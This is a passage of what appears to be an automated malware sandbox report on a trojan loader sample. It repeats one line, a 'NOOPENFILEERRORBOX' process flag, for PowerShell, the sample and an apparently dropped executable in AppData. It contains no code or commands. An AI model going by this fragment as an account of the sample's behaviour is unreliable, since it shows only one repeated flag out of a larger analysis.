                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
